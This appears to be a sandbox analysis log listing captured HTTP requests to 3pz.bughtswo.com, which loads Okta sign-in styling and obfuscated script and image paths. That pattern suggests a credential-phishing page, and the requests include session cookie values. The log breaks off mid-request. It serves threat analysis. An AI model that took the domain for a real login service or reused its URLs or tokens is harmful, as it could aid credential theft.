Source: global traffic	HTTP traffic detected: GET /assets/js/sdk/okta-signin-widget/7.18.0/css/okta-sign-in.min.css HTTP/1.1Host: ok4static.oktacdn.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,/;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleSec-Fetch-Storage-Access: activeReferer: https://3pz.bughtswo.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /assets/loginpage/css/loginpage-theme.e0d37a504604ef874bad26435d62011f.css HTTP/1.1Host: ok4static.oktacdn.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,/;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleSec-Fetch-Storage-Access: activeReferer: https://3pz.bughtswo.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /GDSherpa-vf.woff2 HTTP/1.1Host: 3pz.bughtswo.comConnection: keep-aliveOrigin: https://3pz.bughtswo.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://3pz.bughtswo.com/pcjgktyoyaysvmnpsseafsrkslpumfzh9xa3ziatrn40zfgb8qgw?XDZZMGXXGMZWWSUFWLHJHAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IktHQUp3RFVmK1puT2dOR1JSb1g0blE9PSIsInZhbHVlIjoiRXMyMkJlN3pYRlZlWWFMRklwMUkweG51ZDNjSXNQMzR3Y0Y1UmFYeUIwV3E2eDhVd0dhWm9Cb3FndE5IcFpHTXYyNWFyZUVIcmpoaTlxWThTMjFQYkMvUTJuMitFVFYvMjZvNG5MODZkeERQME5XY21HK1dkK1BaMnlBSko2SGkiLCJtYWMiOiIzYWZmM2QwMzcwY2I1YzUzNDNiNWE3ZjU3NjFlZWNkODZiMDYxNTgzM2Q2OWVlY2U5NmM4ZjY5ZWY5NmNiMTQ1IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlFMTU5mQ2FLWlE0azBtS25Nakw1VGc9PSIsInZhbHVlIjoibExPVmViZ2hNMUt2M3ZhWVRSNSt1bmZIYXNiY1p5QnZLVnF2VFF3a3diOVQ4RUNGV0N1UWppbHZRSVNOUnhzcEtvcDYrSGpiOUZ6VnNrKzJmbERwSkJoTVBCSkQ0by9KSGdGT3Q1YkVwUzNzN2RGV3Y5VlRjQ0hLSFFzTHlsWm4iLCJtYWMiOiI2MWQwMTllYWRjNDUxN2U4YzllMzlkNmU1YTJiOWEzOTg1OGUwZjg4ODc3Mjc2N2FhY2M1MDRlM2NjODlmOWE0IiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /GDSherpa-vf2.woff2 HTTP/1.1Host: 3pz.bughtswo.comConnection: keep-aliveOrigin: https://3pz.bughtswo.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://3pz.bughtswo.com/pcjgktyoyaysvmnpsseafsrkslpumfzh9xa3ziatrn40zfgb8qgw?XDZZMGXXGMZWWSUFWLHJHAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IktHQUp3RFVmK1puT2dOR1JSb1g0blE9PSIsInZhbHVlIjoiRXMyMkJlN3pYRlZlWWFMRklwMUkweG51ZDNjSXNQMzR3Y0Y1UmFYeUIwV3E2eDhVd0dhWm9Cb3FndE5IcFpHTXYyNWFyZUVIcmpoaTlxWThTMjFQYkMvUTJuMitFVFYvMjZvNG5MODZkeERQME5XY21HK1dkK1BaMnlBSko2SGkiLCJtYWMiOiIzYWZmM2QwMzcwY2I1YzUzNDNiNWE3ZjU3NjFlZWNkODZiMDYxNTgzM2Q2OWVlY2U5NmM4ZjY5ZWY5NmNiMTQ1IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlFMTU5mQ2FLWlE0azBtS25Nakw1VGc9PSIsInZhbHVlIjoibExPVmViZ2hNMUt2M3ZhWVRSNSt1bmZIYXNiY1p5QnZLVnF2VFF3a3diOVQ4RUNGV0N1UWppbHZRSVNOUnhzcEtvcDYrSGpiOUZ6VnNrKzJmbERwSkJoTVBCSkQ0by9KSGdGT3Q1YkVwUzNzN2RGV3Y5VlRjQ0hLSFFzTHlsWm4iLCJtYWMiOiI2MWQwMTllYWRjNDUxN2U4YzllMzlkNmU1YTJiOWEzOTg1OGUwZjg4ODc3Mjc2N2FhY2M1MDRlM2NjODlmOWE0IiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /github-production-release-asset-2e65be/2925284/11f3acf8-4ccb-11e6-8ce4-c179c0a212de?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250318%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250318T005458Z&X-Amz-Expires=300&X-Amz-Signature=b818719a854c0e41447bb4b3f5401a207a6130937cb292bb6da819d77b602586&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Drandexp.min.js&response-content-type=application%2Foctet-stream HTTP/1.1Host: objects.githubusercontent.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://3pz.bughtswo.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /56usdLGyORYNk44l9ghb0mDtUEm8nDuuFwg67110 HTTP/1.1Host: 3pz.bughtswo.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://3pz.bughtswo.com/pcjgktyoyaysvmnpsseafsrkslpumfzh9xa3ziatrn40zfgb8qgw?XDZZMGXXGMZWWSUFWLHJHAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IktHQUp3RFVmK1puT2dOR1JSb1g0blE9PSIsInZhbHVlIjoiRXMyMkJlN3pYRlZlWWFMRklwMUkweG51ZDNjSXNQMzR3Y0Y1UmFYeUIwV3E2eDhVd0dhWm9Cb3FndE5IcFpHTXYyNWFyZUVIcmpoaTlxWThTMjFQYkMvUTJuMitFVFYvMjZvNG5MODZkeERQME5XY21HK1dkK1BaMnlBSko2SGkiLCJtYWMiOiIzYWZmM2QwMzcwY2I1YzUzNDNiNWE3ZjU3NjFlZWNkODZiMDYxNTgzM2Q2OWVlY2U5NmM4ZjY5ZWY5NmNiMTQ1IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlFMTU5mQ2FLWlE0azBtS25Nakw1VGc9PSIsInZhbHVlIjoibExPVmViZ2hNMUt2M3ZhWVRSNSt1bmZIYXNiY1p5QnZLVnF2VFF3a3diOVQ4RUNGV0N1UWppbHZRSVNOUnhzcEtvcDYrSGpiOUZ6VnNrKzJmbERwSkJoTVBCSkQ0by9KSGdGT3Q1YkVwUzNzN2RGV3Y5VlRjQ0hLSFFzTHlsWm4iLCJtYWMiOiI2MWQwMTllYWRjNDUxN2U4YzllMzlkNmU1YTJiOWEzOTg1OGUwZjg4ODc3Mjc2N2FhY2M1MDRlM2NjODlmOWE0IiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /klSe5FeF4V4B9AsN4kzckt7xcRfhr56nJ41v2BUS7L5ZHUtaQLGpmLSV8ukuv220 HTTP/1.1Host: 3pz.bughtswo.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://3pz.bughtswo.com/pcjgktyoyaysvmnpsseafsrkslpumfzh9xa3ziatrn40zfgb8qgw?XDZZMGXXGMZWWSUFWLHJHAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IktHQUp3RFVmK1puT2dOR1JSb1g0blE9PSIsInZhbHVlIjoiRXMyMkJlN3pYRlZlWWFMRklwMUkweG51ZDNjSXNQMzR3Y0Y1UmFYeUIwV3E2eDhVd0dhWm9Cb3FndE5IcFpHTXYyNWFyZUVIcmpoaTlxWThTMjFQYkMvUTJuMitFVFYvMjZvNG5MODZkeERQME5XY21HK1dkK1BaMnlBSko2SGkiLCJtYWMiOiIzYWZmM2QwMzcwY2I1YzUzNDNiNWE3ZjU3NjFlZWNkODZiMDYxNTgzM2Q2OWVlY2U5NmM4ZjY5ZWY5NmNiMTQ1IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlFMTU5mQ2FLWlE0azBtS25Nakw1VGc9PSIsInZhbHVlIjoibExPVmViZ2hNMUt2M3ZhWVRSNSt1bmZIYXNiY1p5QnZLVnF2VFF3a3diOVQ4RUNGV0N1UWppbHZRSVNOUnhzcEtvcDYrSGpiOUZ6VnNrKzJmbERwSkJoTVBCSkQ0by9KSGdGT3Q1YkVwUzNzN2RGV3Y5VlRjQ0hLSFFzTHlsWm4iLCJtYWMiOiI2MWQwMTllYWRjNDUxN2U4YzllMzlkNmU1YTJiOWEzOTg1OGUwZjg4ODc3Mjc2N2FhY2M1MDRlM2NjODlmOWE0IiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /klCOczC1guexDGXVCE0TqxcNG891JB3LCJ5AUxbOyWvzDab230 HTTP/1.1Host: 3pz.bughtswo.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://3pz.bughtswo.com/pcjgktyoyaysvmnpsseafsrkslpumfzh9xa3ziatrn40zfgb8qgw?XDZZMGXXGMZWWSUFWLHJHAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IktHQUp3RFVmK1puT2dOR1JSb1g0blE9PSIsInZhbHVlIjoiRXMyMkJlN3pYRlZlWWFMRklwMUkweG51ZDNjSXNQMzR3Y0Y1UmFYeUIwV3E2eDhVd0dhWm9Cb3FndE5IcFpHTXYyNWFyZUVIcmpoaTlxWThTMjFQYkMvUTJuMitFVFYvMjZvNG5MODZkeERQME5XY21HK1dkK1BaMnlBSko2SGkiLCJtYWMiOiIzYWZmM2QwMzcwY2I1YzUzNDNiNWE3ZjU3NjFlZWNkODZiMDYxNTgzM2Q2OWVlY2U5NmM4ZjY5ZWY5NmNiMTQ1IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlFMTU5mQ2FLWlE0azBtS25Nakw1VGc9PSIsInZhbHVlIjoibExPVmViZ2hNMUt2M3ZhWVRSNSt1bmZIYXNiY1p5QnZLVnF2VFF3a3diOVQ4RUNGV0N1UWppbHZRSVNOUnhzcEtvcDYrSGpiOUZ6VnNrKzJmbERwSkJoTVBCSkQ0by9KSGdGT3Q1YkVwUzNzN2RGV3Y5VlRjQ0hLSFFzTHlsWm4iLCJtYWMiOiI2MWQwMTllYWRjNDUxN2U4YzllMzlkNmU1YTJiOWEzOTg1OGUwZjg4ODc3Mjc2N2FhY2M1MDRlM2NjODlmOWE0IiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /klSe5FeF4V4B9AsN4kzckt7xcRfhr56nJ41v2BUS7L5ZHUtaQLGpmLSV8ukuv220 HTTP/1.1Host: 3pz.bughtswo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IktHQUp3RFVmK1puT2dOR1JSb1g0blE9PSIsInZhbHVlIjoiRXMyMkJlN3pYRlZlWWFMRklwMUkweG51ZDNjSXNQMzR3Y0Y1UmFYeUIwV3E2eDhVd0dhWm9Cb3FndE5IcFpHTXYyNWFyZUVIcmpoaTlxWThTMjFQYkMvUTJuMitFVFYvMjZvNG5MODZkeERQME5XY21HK1dkK1BaMnlBSko2SGkiLCJtYWMiOiIzYWZmM2QwMzcwY2I1YzUzNDNiNWE3ZjU3NjFlZWNkODZiMDYxNTgzM2Q2OWVlY2U5NmM4ZjY5ZWY5NmNiMTQ1IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlFMTU5mQ2FLWlE0azBtS25Nakw1VGc9PSIsInZhbHVlIjoibExPVmViZ2hNMUt2M3ZhWVRSNSt1bmZIYXNiY1p5QnZLVnF2VFF3a3diOVQ4RUNGV0N1UWppbHZRSVNOUnhzcEtvcDYrSGpiOUZ6VnNrKzJmbERwSkJoTVBCSkQ0by9KSGdGT3Q1YkVwUzNzN2RGV3Y5VlRjQ0hLSFFzTHlsWm4iLCJtYWMiOiI2MWQwMTllYWRjNDUxN2U4YzllMzlkNmU1YTJiOWEzOTg1OGUwZjg4ODc3Mjc2N2FhY2M1MDRlM2NjODlmOWE0IiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /klCOczC1guexDGXVCE0TqxcNG891JB3LCJ5AUxbOyWvzDab230 HTTP/1.1Host: 3pz.bughtswo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IktHQUp3RFVmK1puT2dOR1JSb1g0blE9PSIsInZhbHVlIjoiRXMyMkJlN3pYRlZlWWFMRklwMUkweG51ZDNjSXNQMzR3Y0Y1UmFYeUIwV3E2eDhVd0dhWm9Cb3FndE5IcFpHTXYyNWFyZUVIcmpoaTlxWThTMjFQYkMvUTJuMitFVFYvMjZvNG5MODZkeERQME5XY21HK1dkK1BaMnlBSko2SGkiLCJtYWMiOiIzYWZmM2QwMzcwY2I1YzUzNDNiNWE3ZjU3NjFlZWNkODZiMDYxNTgzM2Q2OWVlY2U5NmM4ZjY5ZWY5NmNiMTQ1IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlFMTU5mQ2FLWlE0azBtS25Nakw1VGc9PSIsInZhbHVlIjoibExPVmViZ2hNMUt2M3ZhWVRSNSt1bmZIYXNiY1p5QnZLVnF2VFF3a3diOVQ4RUNGV0N1UWppbHZRSVNOUnhzcEtvcDYrSGpiOUZ6VnNrKzJmbERwSkJoTVBCSkQ0by9KSGdGT3Q1YkVwUzNzN2RGV3Y5VlRjQ0hLSFFzTHlsWm4iLCJtYWMiOiI2MWQwMTllYWRjNDUxN2U4YzllMzlkNmU1YTJiOWEzOTg1OGUwZjg4ODc3Mjc2N2FhY2M1MDRlM2NjODlmOWE0IiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /yfuOUwyTI9qASHIO1Yd1WuHEVWTfcFf2n32Nn6H6lWun5L5SxS2l HTTP/1.1Host: 3pz.bughtswo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImZGMUFVc1RsUitTa1NhUXYvaCtvK1E9PSIsInZhbHVlIjoiK0I5QXNPWERMcFJvenVtNGg3RDNFajZPV1RtaXFYUDJteDZOOVU3eitibVUya2tienhIWklKaEpyenhzcS9YUjZoYU02bkVzUU9raUlGbUlaeHNra0tXSDQ0MzhDRVRrU2NyZktpMUw5NStJeDFmWCtFUlRwb0NOU2w5RSt1emEiLCJtYWMiOiIyN2NlNGZjMmU4MGE1NWUyYTBlMTdiNjUwZDBlNzJmN2ViZjg0ZTUzYzExMDYyODE2YThiNjM1YWZmZGU2ZGQ5IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlZ5SHJVUkJmaXVEQzFnbG5BOGp0Y3c9PSIsInZhbHVlIjoiaFdaSFp6bVVQcHhqWmZvejRzZnR3TDloaW9LRG01UkZWaWRMWDdIUGRYSi9wZzNtQjVka2htVTQxaEhmeGZOK0lZQWdMb1hvWGVDNlZMTy9tUC9tekRuQmxzMlYvZzlMbXlxSjdmeUJNVlZvWkNNdDBoTTlLWmtWVGYwaVQ0T0EiLCJtYWMiOiJhODcwNTAyNDRkMjUwZTdhZmQzNGY2MGI2NTQ3NzVlNGFkMzUzYzc1OWNhZDUxOTJjOGIzMTlhMmNmODgzYjI4IiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /wxB2I98tBROJelAq0Qq5WjZ6UMxcstFpC8Y9kgRgGII0H34126 HTTP/1.1Host: 3pz.bughtswo.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://3pz.bughtswo.com/pcjgktyoyaysvmnpsseafsrkslpumfzh9xa3ziatrn40zfgb8qgw?XDZZMGXXGMZWWSUFWLHJHAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImZGMUFVc1RsUitTa1NhUXYvaCtvK1E9PSIsInZhbHVlIjoiK0I5QXNPWERMcFJvenVtNGg3RDNFajZPV1RtaXFYUDJteDZOOVU3eitibVUya2tienhIWklKaEpyenhzcS9YUjZoYU02bkVzUU9raUlGbUlaeHNra0tXSDQ0MzhDRVRrU2NyZktpMUw5NStJeDFmWCtFUlRwb0NOU2w5RSt1emEiLCJtYWMiOiIyN2NlNGZjMmU4MGE1NWUyYTBlMTdiNjUwZDBlNzJmN2ViZjg0ZTUzYzExMDYyODE2YThiNjM1YWZmZGU2ZGQ5IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlZ5SHJVUkJmaXVEQzFnbG5BOGp0Y3c9PSIsInZhbHVlIjoiaFdaSFp6bVVQcHhqWmZvejRzZnR3TDloaW9LRG01UkZWaWRMWDdIUGRYSi9wZzNtQjVka2htVTQxaEhmeGZOK0lZQWdMb1hvWGVDNlZMTy9tUC9tekRuQmxzMlYvZzlMbXlxSjdmeUJNVlZvWkNNdDBoTTlLWmtWVGYwaVQ0T0EiLCJtYWMiOiJhODcwNTAyNDRkMjUwZTdhZmQzNGY2MGI2NTQ3NzVlNGFkMzUzYzc1OWNhZDUxOTJjOGIzMTlhMmNmODgzYjI4IiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /opuxRiSxTmEM15vBJMb9leXlu5sefNsAugLT2OPWIt7nw45140 HTTP/1.1Host: 3pz.bughtswo.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://3pz.bughtswo.com/pcjgktyoyaysvmnpsseafsrkslpumfzh9xa3ziatrn40zfgb8qgw?XDZZMGXXGMZWWSUFWLHJHAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImZGMUFVc1RsUitTa1NhUXYvaCtvK1E9PSIsInZhbHVlIjoiK0I5QXNPWERMcFJvenVtNGg3RDNFajZPV1RtaXFYUDJteDZOOVU3eitibVUya2tienhIWklKaEpyenhzcS9YUjZoYU02bkVzUU9raUlGbUlaeHNra0tXSDQ0MzhDRVRrU2NyZktpMUw5NStJeDFmWCtFUlRwb0NOU2w5RSt1emEiLCJtYWMiOiIyN2NlNGZjMmU4MGE1NWUyYTBlMTdiNjUwZDBlNzJmN2ViZjg0ZTUzYzExMDYyODE2YThiNjM1YWZmZGU2ZGQ5IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlZ5SHJVUkJmaXVEQzFnbG5BOGp0Y3c9PSIsInZhbHVlIjoiaFdaSFp6bVVQcHhqWmZvejRzZnR3TDloaW9LRG01UkZWaWRMWDdIUGRYSi9wZzNtQjVka2htVTQxaEhmeGZOK0lZQWdMb1hvWGVDNlZMTy9tUC9tekRuQmxzMlYvZzlMbXlxSjdmeUJNVlZvWkNNdDBoTTlLWmtWVGYwaVQ0T0EiLCJtYWMiOiJhODcwNTAyNDRkMjUwZTdhZmQzNGY2MGI2NTQ3NzVlNGFkMzUzYzc1OWNhZDUxOTJjOGIzMTlhMmNmODgzYjI4IiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /mnGeMwtuiseg6FuvHXI23EgklvYhJt1DtbpXmd9tZGrz78150 HTTP/1.1Host: 3pz.bughtswo.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://3pz.bughtswo.com/pcjgktyoyaysvmnpsseafsrkslpumfzh9xa3ziatrn40zfgb8qgw?XDZZMGXXGMZWWSUFWLHJHAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImZGMUFVc1RsUitTa1NhUXYvaCtvK1E9PSIsInZhbHVlIjoiK0I5QXNPWERMcFJvenVtNGg3RDNFajZPV1RtaXFYUDJteDZOOVU3eitibVUya2tienhIWklKaEpyenhzcS9YUjZoYU02bkVzUU9raUlGbUlaeHNra0tXSDQ0MzhDRVRrU2NyZktpMUw5NStJeDFmWCtFUlRwb0NOU2w5RSt1emEiLCJtYWMiOiIyN2NlNGZjMmU4MGE1NWUyYTBlMTdiNjUwZDBlNzJmN2ViZjg0ZTUzYzExMDYyODE2YThiNjM1YWZmZGU2ZGQ5IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlZ5SHJVUkJmaXVEQzFnbG5BOGp0Y3c9PSIsInZhbHVlIjoiaFdaSFp6bVVQcHhqWmZvejRzZnR3TDloaW9LRG01UkZWaWRMWDdIUGRYSi9wZzNtQjVka2htVTQxaEhmeGZOK0lZQWdMb1hvWGVDNlZMTy9tUC9tekRuQmxzMlYvZzlMbXlxSjdmeUJNVlZvWkNNdDBoTTlLWmtWVGYwaVQ0T0EiLCJtYWMiOiJhODcwNTAyNDRkMjUwZTdhZmQzNGY2MGI2NTQ3NzVlNGFkMzUzYzc1OWNhZDUxOTJjOGIzMTlhMmNmODgzYjI4IiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /kl3XiVz0aPutz6bSmjR9D2P593BDt6Z4DUWuOyzYQYdRIcPOAJBMuwV98WwDp5V256170 HTTP/1.1Host: 3pz.bughtswo.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://3pz.bughtswo.com/pcjgktyoyaysvmnpsseafsrkslpumfzh9xa3ziatrn40zfgb8qgw?XDZZMGXXGMZWWSUFWLHJHAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImZGMUFVc1RsUitTa1NhUXYvaCtvK1E9PSIsInZhbHVlIjoiK0I5QXNPWERMcFJvenVtNGg3RDNFajZPV1RtaXFYUDJteDZOOVU3eitibVUya2tienhIWklKaEpyenhzcS9YUjZoYU02bkVzUU9raUlGbUlaeHNra0tXSDQ0MzhDRVRrU2NyZktpMUw5NStJeDFmWCtFUlRwb0NOU2w5RSt1emEiLCJtYWMiOiIyN2NlNGZjMmU4MGE1NWUyYTBlMTdiNjUwZDBlNzJmN2ViZjg0ZTUzYzExMDYyODE2YThiNjM1YWZmZGU2ZGQ5IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlZ5SHJVUkJmaXVEQzFnbG5BOGp0Y3c9PSIsInZhbHVlIjoiaFdaSFp6bVVQcHhqWmZvejRzZnR3TDloaW9LRG01UkZWaWRMWDdIUGRYSi9wZzNtQjVka2htVTQxaEhmeGZOK0lZQWdMb1hvWGVDNlZMTy9tUC9tekRuQmxzMlYvZzlMbXlxSjdmeUJNVlZvWkNNdDBoTTlLWmtWVGYwaVQ0T0EiLCJtYWMiOiJhODcwNTAyNDRkMjUwZTdhZmQzNGY2MGI2NTQ3NzVlNGFkMzUzYzc1OWNhZDUxOTJjOGIzMTlhMmNmODgzYjI4IiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /wxFhzp0CgTafW2l0GEvW2qmRzDYozFmnbQAb174rg3tC0nv90180 HTTP/1.1Host: 3pz.bughtswo.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: 